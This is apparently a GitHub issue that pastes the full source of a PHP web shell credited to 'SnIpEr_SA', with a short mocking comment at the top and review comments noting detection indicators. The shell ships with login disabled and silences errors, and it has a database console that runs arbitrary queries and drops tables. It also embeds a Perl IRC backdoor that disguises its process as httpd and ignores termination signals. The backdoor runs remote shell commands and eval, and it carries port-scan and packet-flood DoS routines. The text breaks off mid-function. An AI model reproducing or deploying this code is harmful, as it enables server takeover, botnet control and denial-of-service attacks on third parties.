Open sniperbou3asba opened 8 years ago
So you skidded a public shell, (possibly) implementing very rudimentary unescape() obfuscation that won't even do what you want it to do. You do realize that once the second half of these functions are introduced to a cPanel or Plesk instance, they'll be deleted and an alert will be raised, right?
By the way, I was notified from the "@exec"
Also, why the hell is this in an issue? That makes absolutely no sense. Did you just decide to copy the content of "your" code into an issue to make it look cool? Pls respunderino :new_moon_with_face:
<?php
/**/
/
~~~~~~~~~~~~~~~~~~~~//* (c)oded by SnIpEr_SA
/* MAIL http://sniper-sa.com , http://sniper-sa.com
/**/
/*
~ ÇáÎíÇÑÇÊ | Options ~*/// ÇááÛÉ | Language
// Interface language; the value is used as a key prefix into the $lang string table later in the file.
// $language='eng' - English
// $language='ar'  - Arabic
$language='ar';
// Authentication
// $auth = 1; - enable login with a password (authentication = On)
// $auth = 0; - disable login with a password (authentication = Off)
// NOTE(review): the shipped value is 0, so the HTTP Basic check guarded by
// `if($auth == 1)` further down never runs and the page is served to anyone
// who can reach its URL.
$auth = 0;
// Username and password for access (Login & Password for access)
// To keep others out of the script, change the following!!! (CHANGE THIS!!!)
// The password goes here as an MD5 hex digest; per the author's comment the password shipped here is 'sniper'.
// You can MD5 your own username and password and put the digests in the fields below.
// NOTE(review): both fields hold the same unsalted MD5 literal. Because the
// digest is a fixed string in the file, it can serve as a static content
// indicator when scanning a web root for copies of this script.
$name='1c27680133b781cadd037e8a6dcc001b'; // username (user login)
$pass='1c27680133b781cadd037e8a6dcc001b'; // password (user password)
/**/
// Prints $copy HTML-escaped. $copy is not assigned anywhere above this line in the visible source.
echo "".htmlspecialchars($copy)."";
// Switches PHP error reporting off for the rest of the request.
// NOTE(review): together with the '@' suppression on the calls below, failures
// of this script are not reported through PHP's error channel; a defender should
// not rely on the PHP error log alone to notice it running.
error_reporting(0);
// Legacy setting: turns runtime magic quotes off.
set_magic_quotes_runtime(0);
// Lifts the execution time limit (0 = unlimited), first via the API call and then via ini_set.
@set_time_limit(0);
@ini_set('max_execution_time',0);
// Asks for output buffering to be off.
@ini_set('output_buffering',0);
// Current safe_mode setting; read again later in the file when host details are collected.
$safe_mode = @ini_get('safe_mode');
// Version string of the script; later stripped of dots and appended to a version.php URL.
$version = '1.31';
// Compatibility shim: on PHP older than 4.1.0 the superglobal arrays are
// aliased (by reference) to the old $HTTP_*_VARS arrays.
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
// When magic_quotes_gpc is reported as on, strip the added backslashes from
// every POST and cookie value so the rest of the script sees them as sent.
// Only $_POST and $_COOKIE are processed here; $_GET is left as-is.
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
// Optional HTTP Basic gate; it runs only when $auth was set to 1 in the options block.
if($auth == 1) {
// Deny when no Basic username was sent, or when md5(username) or md5(password)
// differs from the digests configured in $name / $pass.
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
// NOTE(review): the realm value and the denial body below are fixed literals
// sent in the HTTP response, so they can be matched in proxy/WAF logs or
// response inspection as indicators of this script.
header('WWW-Authenticate: Basic realm="SnIpEr_SA shell"');
header('HTTP/1.0 401 Unauthorized');
exit("SnIpEr_SA : Access Denied");
}
}
$head = '
"; echo"The Host: $_SESSION[host], ÇÓã ÇáãÓÊÎÏã: $user Çæ Çáßáãå ÇáÓÑíå ÎØÇÁ.
"; echo"ÝÖáÇð ÓÌá ÎÑæÌ ááãÍÇæáå ãÑå ÇÎÑì.\n"; echo"
Please try again later.\n"; exit(); } } //********************************************************************* function exequery($sql, $tablename, $db){ $result= @mysql_query( $sql ); if($result){ //echo "Query successful"; return $result; }else{ echo"Sorry your Query failed: $sql
error:".mysql_error()."\n"; return false; } } //*************************************************** $fieldtypes = array("BIGINT", "BLOB", "CHAR", "DATE", "DATETIME", "DECIMAL", "DOUBLE", "ENUM", "FLOAT", "INT", "INTEGER", "LONGBLOB", "LONGTEXT", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "NUMERIC", "PRECISION", "REAL","SET", "SMALLINT", "TEXT", "TIME", "TIMESTAMP", "TINYBLOB", "TINYINT", "TINYTEXT", "VARCHAR", "YEAR" ); //****************** Search Form **************************** function searchtableform($tablename, $dbname){ echo"\n"; } //********************* Search ************************* function searcht($tablename, $dbname, $searchval){ if(! empty($searchval)){ // $searchval= str_replace(";",' ', $searchval); $result=exequery("Select * from $tablename", $tablename, $dbname); //$result=mysql_query("Select * from $tablename"); $num = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); $whr="where "; $tok=explode(" ",$searchval); for ($t =0; $t < count($tok); $t++){ for ( $c = 0; $c < $num; $c++){ $fn =mysql_field_name($fields, $c); $whr .=" $fn like '%$tok[$t]%' or "; } } $whr=trim(substr_replace($whr, " ", -3)); $query="Select * from $tablename $whr"; $result=exequery($query, $tablename, $dbname); return $result; } } //*********************GOTO buttons************************* //provides a form and button. function goto($tablename, $dbname, $action, $class, $name, $va ){ //Adds a button. echo"\n"; //echo"$va"; //} } //*********************** ShowDB *********************************** function showdb(){ //function showdb($backuppath){ $link=connectmysql(); if ($link){ echo"
ÅäÔÇÁ ÞÇÚÏÉ ÌÏíÏÉ
\n"; echo""; echo"
ÞÇÆãå ÇáÞæÇÚÏ ÇáãÊæÝÑå
\n"; //Restrict the database for users $dbnamearray= dbrestrict(); showdbs($dbnamearray); echo"Post: "; foreach($_POST as $pram=>$value){ echo"$pram: $value, "; } echo"
Session: "; foreach($_SESSION as $pram=>$value){ echo"$pram: $value, "; } } echo"\n"; echo"\n"; echo"\n"; echo"
ÓßÑÈÊ ÇáÇÊÕÇá ÈÞæÇÚÏ ÇáÈíÇäÇÊ
\n"; //******************* Session Logon *********************** if(isset($_POST['logout'])){ $_POST['dbname']=""; session_unset(); session_destroy(); } if(isset($_POST['userid']) && isset($_POST['pword1'])){ $_SESSION['user'] = $_POST['userid']; $_SESSION['password'] = $_POST['pword1']; } if (!isset($_SESSION['user']) || !isset($_SESSION['password'])){ echo"ÇÏÎá ÈíÇäÇÊ ÇáÓíÑÝÑ ÇáãÎÊÑÞ
\n"; If(!isset($dbnamearray)){ $dbnamearray=""; } show_login($dbnamearray); echo"ÞÇÚÏÉ ÌÏíÏÉ $_SESSION[dbname]
\n"; } } } //********************************************* if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ //*********post //Databse names showdb(); } //************************ Choose DB ************* if(isset($_POST['dbname']) && $_POST['dbname']==""){ showdb(); } //********** if (isset($_SESSION['dbname']) || isset($_POST['dbna']) || isset($_POST['dbname'])){ //************************************* //connection if (isset($_SESSION['dbname'])){ $dbsetname = $_SESSION['dbname']; }elseif(isset($_POST['dbname'])){ $dbsetname = $_POST['dbname']; $_SESSION['dbname'] = $_POST['dbname']; }else{ $dbsetname = $_POST['dbna']; $_SESSION['dbname'] = $_POST['dbna']; } } //*************************** we have a DB set if(isset($dbsetname) && $dbsetname!=""){ $link= connectmysql(); //echo"DBS: $dbsetname"; $conn = connectdb($dbsetname, $link); //*********** Drop Table ************** if(isset($_POST['deltable'])){ $showall=false; $tablename=$_POST['tablename']; echo"!!! ÊÍÐíÑ !!!
\n"; $va="Drop $tablename"; goto($tablename, $dbname,$action, 'del', 'droptab', $va ); } if(isset($_POST['droptab'])){ $tablename=$_POST['tablename']; $dsql = "drop table $tablename"; $result=exequery($dsql, $tablename, $dbname); unset($tablename); //="false"; unset($_POST['tablename']); } //*****************Write Your Own Query ***************** if(isset($_POST['wyoq'])){ //post $value="ÇáæÇÌåå ÇáÑÆíÓíå ááÓßÑÈÊ"; goto($tablename, $dbname, $action, 'but', 'start', $value ); echo"ÇäÊ ÊÍÇæá ãÓÍ åÐÇ ÇáÌÏæá $tablename
"; echo"åá ÇäÊ ãÊÇßÏ ãä ÇáÞíÇã ÈÇáÚãáíå¿?
\n"; } if(isset($_POST['runquery'])){ $wyoqta = StripSlashes($_POST['wyoqta']); $result=exequery($wyoqta, " ", " "); if(@mysql_num_rows($result) >0){ $numrows=mysql_num_rows($result); $flds=mysql_num_fields($result); echo"
"; echo"
\n"; //************************************************** if(isset($_POST['addrec'])){ // $showall=false; $result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']); }elseif(isset($_POST['add'])){ $showall=false; addform($tablename, $_SESSION['dbname']); }elseif(isset($_POST['delete'])){ //delete record has been pushed // $showall=false; $whr=buildwhr($_POST['pk'], $_POST['pv']); $sql = "delete from $tablename where $whr"; $result=exequery($sql, $tablename, $_SESSION['dbname']); }elseif (isset($_POST['edit'])){//Edit $showall=false; $whr = buildwhr( $_POST['pk'], $_POST['pv']); //$tablename = $_SESSION['tablename']; $sql= "Select * from $tablename where $whr"; $result=exequery($sql, $tablename, $_SESSION['dbname']); editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']); }elseif(isset($_POST['editrec'])){ // $showall=false; $result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']); } //**************** Search ************************************ if(isset($_POST['searchval'])){ $searchval=$_POST['searchval']; }elseif(isset($_GET['searchval'])){ $searchval=$_GET['searchval']; }else{ $searchval=""; } if (isset($_GET['tablename'])){ $tablename = $_GET['tablename']; } if((isset($_POST['search'])|| isset($searchval)) && $searchval !=""){ $result=searcht($tablename, $_SESSION['dbname'], $searchval); }else{ //Display All $query = "select * from $tablename"; $result=exequery($query, $tablename, $_SESSION['dbname']); } //***************** Display record count ***************************************** if($showall){ $num_rows = mysql_num_rows($result); //Workout whick page to display if(!isset($_GET['pg']) && !isset($pg)){ $beg=0; $pg=0; }else{ if(isset($_GET['pback'])){ $pg=$_GET['pg']; }else{ $pg=$_GET['pg']; } if($pg < 0 ){ $pg=0; } if($pg > $num_rows/$pagemax){ $pg=ceil($num_rows/$pagemax)-1; } $beg = $pg * $pagemax; } if (!isset($_POST['add'])){ $pscrol=" "; $pagescrol =" "; $pagescrol = 
whichpage($num_rows, $pagemax, $pg, $tablename, $searchval); echo "$pagescrol\n"; //Display next Top page menu $flds = mysql_num_fields($result); echo"
"; echo "$pagescrol\n"; //Display bottom next page menu } echo"
\n"; }//showall if(isset($_POST['tablename'])){ echo"
"; switch($sql->query($query)) { case '0': echo "
"; break; } } } } } echo "
"; echo "
"; } echo '
".$lang[$language.'_text56']."
"; } echo "Dont Forget to Delete Loader.pl in /tmp
"; ####################################################### ######################IRC Trojan########################## $file=" ################ CONFIGURACAO ################################################################# my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps # #----------------------------------------------################################################ my \$linas_max='48'; # Evita o flood :) depois de X linhas # #----------------------------------------------################################################ my \$sleep='4'; # ele dorme X segundos # ##################### IRC ##################################################################### my @adms=(\"$ircadmin\"); # Nick do administrador # #----------------------------------------------################################################ my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") # #----------------------------------------------################################################ my \$nick='$irclabel'; # Nick do bot. 
Caso esteja em uso vai aparecer # # aparecer com numero radonamico no final # #----------------------------------------------################################################ my \$ircname = 'Linux'; # User ID # #----------------------------------------------################################################ chop (my \$realname = `uname -a`); # Full Name # #----------------------------------------------################################################ \$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado # # caso não seja especificado no argumento # #----------------------------------------------################################################ my \$porta='6667'; # Porta do servidor de irc # ################ ACESSO A SHELL ############################################################### my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell # ############################################################################################### my \$VERSAO = '0.2'; \$SIG{'INT'} = 'IGNORE'; \$SIG{'HUP'} = 'IGNORE'; \$SIG{'TERM'} = 'IGNORE'; \$SIG{'CHLD'} = 'IGNORE'; \$SIG{'PS'} = 'IGNORE'; \$SIG{'STOP'} = 'IGNORE'; use IO::Socket; use Socket; use IO::Select; chdir(\"/\"); \$servidor=\"\$ARGV[0]\" if \$ARGV[0]; $0=\"\$processo\".\"\0\"x16;; my \$pid=fork; exit if \$pid; die \"Problema com o fork: $!\" unless defined(\$pid); my \$dcc_sel = new IO::Select->new(); ############################# # B0tchZ na veia ehehe :P # ############################# \$sel_cliente = IO::Select->new(); sub sendraw { if ($#_ == '1') { my \$socket = \$_[0]; print \$socket \"\$_[1]\\n\"; } else { print \$IRC_cur_socket \"\$_[0]\\n\"; } } ################################# sub conectar { my \$meunick = \$_[0]; my \$servidor_con = \$_[1]; my \$porta_con = \$_[2]; my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1); if (defined(\$IRC_socket)) { \$IRC_cur_socket = \$IRC_socket; \$IRC_socket->autoflush(1); 
\$sel_cliente->add(\$IRC_socket); \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\"; \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\"; \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost; nick(\"\$meunick\"); sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\"); sleep 1; } } ##################### my \$line_temp; while( 1 ) { while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); } delete(\$irc_servers{''}) if (defined(\$irc_servers{''})); &DCC::connections; my @ready = \$sel_cliente->can_read(0); next unless(@ready); foreach \$fh (@ready) { \$IRC_cur_socket = \$fh; \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'}; \$nread = sysread(\$fh, \$msg, 4096); if (\$nread == 0) { \$sel_cliente->remove(\$fh); \$fh->close; delete(\$irc_servers{\$fh}); } @lines = split (/\\n/, \$msg); for(my \$c=0; \$c<= $#lines; \$c++) { \$line = \$lines[\$c]; \$line=\$line_temp.\$line if (\$line_temp); \$line_temp=''; \$line =~ s/\\r$//; unless (\$c == $#lines) { parse(\"\$line\"); } else { if ($#lines == 0) { parse(\"\$line\"); } elsif (\$lines[\$c] =~ /\\r$/) { parse(\"\$line\"); } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse(\"\$line\"); } else { \$line_temp = \$line; } } } } } ######################### sub parse { my \$servarg = shift; if (\$servarg =~ /^PING \:(.*)/) { sendraw(\"PONG :$1\"); } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) 
\:(.+)/) { my \$pn=$1; my \$onde = $4; my \$args = $5; if (\$args =~ /^\\001VERSION\\001$/) { notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\"); } if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) { if (\$onde eq \"\$meunick\"){ shell(\"\$pn\", \"\$args\"); } if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) { my \$natrix = $1; my \$arg = $2; if (\$arg =~ /^\!(.*)/) { ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/); } elsif (\$arg =~ /^\@(.*)/) { \$ondep = \$onde; \$ondep = \$pn if \$onde eq \$meunick; bfunc(\"\$ondep\",\"$1\"); } else { shell(\"\$onde\", \"\$arg\"); } } } } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc(\$meunick)) { \$meunick=$4; \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; } } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) { nick(\"\$meunick\".int rand(9999)); } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { \$meunick = $2; \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick; \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\"; foreach my \$canal (@canais) { sendraw(\"JOIN \$canal\"); } } } ########################## sub bfunc { my \$printl = \$_[0]; my \$funcarg = \$_[1]; if (my \$pid = fork) { waitpid(\$pid, 0); } else { if (fork) { exit; } else { if (\$funcarg =~ /^portscan (.*)/) { my \$hostip=\"$1\"; my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\"); my (@aberta, %porta_banner); foreach my \$porta (@portas) { my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4); if (\$scansock) { push (@aberta, \$porta); \$scansock->close; } } if (@aberta) { sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\"); } else { sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\"); } } if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) { my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\"); \$dtime = 1 if \$dtime == 0; my %bytes; \$bytes{igmp} 
= $2 * \$pacotes{igmp}; \$bytes{icmp} = $2 * \$pacotes{icmp}; \$bytes{o} = $2 * \$pacotes{o}; \$bytes{udp} = $2 * \$pacotes{udp}; \$bytes{tcp} = $2 * \$pacotes{tcp}; sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\"); sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\"); sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o})); sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o})); sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Média de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\"); } exit; } } } ########################## sub ircase { my (\$kem, \$printl, \$case) = @_; if (\$case =~ /^join (.*)/) { j(\"$1\"); } if (\$case =~ /^part (.*)/) { p(\"$1\"); } if (\$case =~ /^rejoin\s+(.*)/) { my \$chan = $1; if (\$chan =~ /^(\d+) (.*)/) { for (my \$ca = 1; \$ca <= $1; \$ca++ ) { p(\"$2\"); j(\"$2\"); } } else { p(\"\$chan\"); j(\"\$chan\"); } } if (\$case =~ /^op/) { op(\"\$printl\", \"\$kem\") if \$case eq \"op\"; my \$oarg = substr(\$case, 3); op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); } if (\$case =~ /^deop/) { deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\"; my \$oarg = substr(\$case, 5); deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); } if (\$case =~ /^voice/) { voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\"; \$oarg = substr(\$case, 6); voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); } if (\$case =~ /^devoice/) { devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\"; \$oarg = substr(\$case, 8); devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/); } if (\$case =~ /^msg\s+(\S+) (.*)/) { msg(\"$1\", \"$2\"); } if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { for (my \$cf = 1; \$cf <= $1; \$cf++) { msg(\"$2\", \"$3\"); } } if (\$case =~ /^ctcp\s+(\S+) (.*)/) { 
ctcp(\"$1\", \"$2\"); } if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { for (my \$cf = 1; \$cf <= $1; \$cf++) { ctcp(\"$2\", \"$3\"); } } if (\$case =~ /^invite\s+(\S+) (.*)/) { invite(\"$1\", \"$2\"); } if (\$case =~ /^nick (.*)/) { nick(\"$1\"); } if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) { conectar(\"$2\", \"$1\", 6667); } if (\$case =~ /^send\s+(\S+)\s+(\S+)/) { DCC::SEND(\"$1\", \"$2\"); } if (\$case =~ /^raw (.*)/) { sendraw(\"$1\"); } if (\$case =~ /^eval (.*)/) { eval \"$1\"; } } ########################## sub shell { return unless \$secv; my \$printl=\$_[0]; my \$comando=\$_[1]; if (\$comando =~ /cd (.*)/) { chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \"); return; } elsif (\$pid = fork) { waitpid(\$pid, 0); } else { if (fork) { exit; } else { my @resp=`\$comando 2>&1 3>&1`; my \$c=0; foreach my \$linha (@resp) { \$c++; chop \$linha; sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\"); if (\$c == \"\$linas_max\") { \$c=0; sleep \$sleep; } } exit; } } } #eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki sub attacker { my \$iaddr = inet_aton(\$_[0]); my \$msg = 'B' x \$_[1]; my \$ftime = \$_[2]; my \$cp = 0; my (%pacotes); \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0; socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++; socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++; socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++; socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++; return(undef) if \$cp == 4; my \$itime = time; my (\$cur_time); while ( 1 ) { for (my \$porta = 1; \$porta <= 65535; \$porta++) { \$cur_time = time - \$itime; last if \$cur_time >= \$ftime; send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++; send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++; send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++; send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++; # DoS ?? 
:P for (my \$pc = 3; \$pc <= 255;\$pc++) { next if \$pc == 6; \$cur_time = time - \$itime; last if \$cur_time >= \$ftime; socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next; send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;; } } last if \$cur_time >= \$ftime; } return(\$cur_time, %pacotes); } ############# # ALIASES # ############# sub action { return unless $#_ == 1; sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\"); } sub ctcp { return unless $#_ == 1; sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\"); } sub msg { return unless $#_ == 1; sendraw(\"PRIVMSG \$_[0] :\$_[1]\"); } sub notice { return unless $#_ == 1; sendraw(\"NOTICE \$_[0] :\$_[1]\"); } sub op { return unless $#_ == 1; sendraw(\"MODE \$_[0] +o \$_[1]\"); } sub deop { return unless $#_ == 1; sendraw(\"MODE \$_[0] -o \$_[1]\"); } sub hop { return unless $#_ == 1; sendraw(\"MODE \$_[0] +h \$_[1]\"); } sub dehop { return unless $#_ == 1; sendraw(\"MODE \$_[0] +h \$_[1]\"); } sub voice { return unless $#_ == 1; sendraw(\"MODE \$_[0] +v \$_[1]\"); } sub devoice { return unless $#_ == 1; sendraw(\"MODE \$_[0] -v \$_[1]\"); } sub ban { return unless $#_ == 1; sendraw(\"MODE \$_[0] +b \$_[1]\"); } sub unban { return unless $#_ == 1; sendraw(\"MODE \$_[0] -b \$_[1]\"); } sub kick { return unless $#_ == 1; sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\"); } sub modo { return unless $#_ == 0; sendraw(\"MODE \$_[0] \$_[1]\"); } sub mode { modo(@_); } sub j { &join(@_); } sub join { return unless $#_ == 0; sendraw(\"JOIN \$_[0]\"); } sub p { part(@_); } sub part {sendraw(\"PART \$_[0]\");} sub nick { return unless $#_ == 0; sendraw(\"NICK \$_[0]\"); } sub invite { return unless $#_ == 1; sendraw(\"INVITE \$_[1] \$_[0]\"); } sub topico { return unless $#_ == 1; sendraw(\"TOPIC \$_[0] \$_[1]\"); } sub topic { topico(@_); } sub whois { return unless $#_ == 0; sendraw(\"WHOIS \$_[0]\"); } sub who { return unless $#_ == 0; sendraw(\"WHO \$_[0]\"); } sub names { return unless $#_ == 0; sendraw(\"NAMES 
\$_[0]\"); } sub away { sendraw(\"AWAY \$_[0]\"); } sub back { away(); } sub quit { sendraw(\"QUIT :\$_[0]\"); } # DCC ######################### package DCC; sub connections { my @ready = \$dcc_sel->can_read(1); # return unless (@ready); foreach my \$fh (@ready) { my \$dcctipo = \$DCC{\$fh}{tipo}; my \$arquivo = \$DCC{\$fh}{arquivo}; my \$bytes = \$DCC{\$fh}{bytes}; my \$cur_byte = \$DCC{\$fh}{curbyte}; my \$nick = \$DCC{\$fh}{nick}; my \$msg; my \$nread = sysread(\$fh, \$msg, 10240); if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) { \$DCC{\$fh}{status} = \"Cancelado\"; \$DCC{\$fh}{ftime} = time; \$dcc_sel->remove(\$fh); \$fh->close; next; } if (\$dcctipo eq \"get\") { \$DCC{\$fh}{curbyte} += length(\$msg); my \$cur_byte = \$DCC{\$fh}{curbyte}; open(FILE, \">> \$arquivo\"); print FILE \"\$msg\" if (\$cur_byte <= \$bytes); close(FILE); my \$packbyte = pack(\"N\", \$cur_byte); print \$fh \"\$packbyte\"; if (\$bytes == \$cur_byte) { \$dcc_sel->remove(\$fh); \$fh->close; \$DCC{\$fh}{status} = \"Recebido\"; \$DCC{\$fh}{ftime} = time; next; } } elsif (\$dcctipo eq \"send\") { my \$send = \$fh->accept; \$send->autoflush(1); \$dcc_sel->add(\$send); \$dcc_sel->remove(\$fh); \$DCC{\$send}{tipo} = 'sendcon'; \$DCC{\$send}{itime} = time; \$DCC{\$send}{nick} = \$nick; \$DCC{\$send}{bytes} = \$bytes; \$DCC{\$send}{curbyte} = 0; \$DCC{\$send}{arquivo} = \$arquivo; \$DCC{\$send}{ip} = \$send->peerhost; \$DCC{\$send}{porta} = \$send->peerport; \$DCC{\$send}{status} = \"Enviando\"; #de cara manda os primeiro 1024 bytes do arkivo.. 
o resto fik com o sendcon open(FILE, \"< \$arquivo\"); my \$fbytes; read(FILE, \$fbytes, 1024); print \$send \"\$fbytes\"; close FILE; # delete(\$DCC{\$fh}); } elsif (\$dcctipo eq 'sendcon') { my \$bytes_sended = unpack(\"N\", \$msg); \$DCC{\$fh}{curbyte} = \$bytes_sended; if (\$bytes_sended == \$bytes) { \$fh->close; \$dcc_sel->remove(\$fh); \$DCC{\$fh}{status} = \"Enviado\"; \$DCC{\$fh}{ftime} = time; next; } open(SENDFILE, \"< \$arquivo\"); seek(SENDFILE, \$bytes_sended, 0); my \$send_bytes; read(SENDFILE, \$send_bytes, 1024); print \$fh \"\$send_bytes\"; close(SENDFILE); } } } ########################## sub SEND { my (\$nick, \$arquivo) = @_; unless (-r \"\$arquivo\") { return(0); } my \$dccark = \$arquivo; \$dccark =~ s/[.*\/](\S+)/$1/; my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'}; my \$longip = unpack(\"N\",inet_aton(\$meuip)); my @filestat = stat(\$arquivo); my \$size_total=\$filestat[7]; if (\$size_total == 0) { return(0); } my (\$porta, \$sendsock); do { \$porta = int rand(64511); \$porta += 1024; \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock); } until \$sendsock; \$DCC{\$sendsock}{tipo} = 'send'; \$DCC{\$sendsock}{nick} = \$nick; \$DCC{\$sendsock}{bytes} = \$size_total; \$DCC{\$sendsock}{arquivo} = \$arquivo; &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\"); } sub GET { my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_; return(0) if (-e \"\$arquivo\"); if (open(FILE, \"> \$arquivo\")) { close FILE; } else { return(0); } my \$dccip=fixaddr(\$dcclongip); return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1); my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0); \$dccsock->autoflush(1); \$dcc_sel->add(\$dccsock); \$DCC{\$dccsock}{tipo} = 'get'; \$DCC{\$dccsock}{itime} = time; \$DCC{\$dccsock}{nick} = \$nick; \$DCC{\$dccsock}{bytes} = \$bytes; 
